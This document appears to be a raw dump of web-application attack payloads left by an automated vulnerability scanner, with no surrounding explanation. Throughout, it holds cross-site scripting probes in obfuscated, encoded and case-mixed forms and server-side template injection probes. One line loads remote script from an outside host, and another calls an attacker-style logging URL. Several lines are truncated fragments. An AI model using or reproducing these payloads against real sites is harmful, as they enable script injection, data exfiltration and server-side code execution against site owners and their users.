555<ak63XkO<

555

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555<input autofocus onfocus=Calb(9084)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%78%6D%61%4C%289448%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=l4tn(9305)>

'"()&%<zzz><ScRiPt >ZdqM(9697)</ScRiPt>

555<iframe src='data:text/html

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=l4tn(9947)>

555

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\xmaL(9592)\u003C/sCripT\u003E

5559257139

555<body onload=uTvG(9106)>

555<img src=//xss.bxss.me/t/dot.gif onload=uTvG(9008)>

555<img src=xyz OnErRor=uTvG(9367)>

555<img/src=">" onerror=alert(9685)>

5559257139

555<img src=xyz OnErRor=l4tn(9947)>

555\u003CScRiPt\xmaL(9592)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555\u003CScRiPt\uTvG(9320)\u003C/sCripT\u003E

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfg3289\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3289

555<img/src=">" onerror=alert(9026)>

555&lt

<a HrEF=jaVaScRiPT:>

555&lt

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<ScRiPt >DUfq(9145)</ScRiPt>

bfgx2219\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2219

%35%35%35%3C%53%63%52%69%50%74%20%3E%6C%34%74%6E%289822%29%3C%2F%73%43%72%69%70%54%3E

\xf6<img zzz onmouseover=xmaL(99591) //\xf6>

555}body{zzz:Expre/**/SSion(Calb(9704))}

\xf6<img zzz onmouseover=uTvG(90381) //\xf6>

555

555<WQ5Z0J>I755O[!+!]</WQ5Z0J>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\l4tn(9815)\u003C/sCripT\u003E

555<input autofocus onfocus=xmaL(9373)>

555hZ02u <ScRiPt >Calb(9310)</ScRiPt>

555<input autofocus onfocus=uTvG(9817)>

dfb{{98991*97996}}xca

555<script>DUfq(9159)</script>

555

555&lt

<a HrEF=http://xss.bxss.me></a>

dfb[[${98991*97996}]]xca

555<WZT2HI>1JGN5[!+!]</WZT2HI>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=l4tn(96321) //\xf6>

555<ScR<ScRiPt>IpT>DUfq(9422)</sCr<ScRiPt>IpT>

<th:t="${dfb}#foreach

dfb__${98991*97996}__::.x

555<ifRAme sRc=9859.com></IfRamE>

<a HrEF=jaVaScRiPT:>

555<ScRiPt >DUfq(9891)</ScRiPt>

555<input autofocus onfocus=l4tn(9274)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555}body{zzz:Expre/**/SSion(xmaL(9612))}

555}body{zzz:Expre/**/SSion(uTvG(9299))}

555<aFngUyi x=9610>

555zmzPc <ScRiPt >xmaL(9239)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9670></ScRiPt>

<a HrEF=http://xss.bxss.me></a>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WUAUE4>ZOBRN[!+!]</WUAUE4>

555<img sRc='http://attacker-9422/log.php?

555<ScRiPt >Xqn3(9866)</ScRiPt>

555UsxOT <ScRiPt >uTvG(9814)</ScRiPt>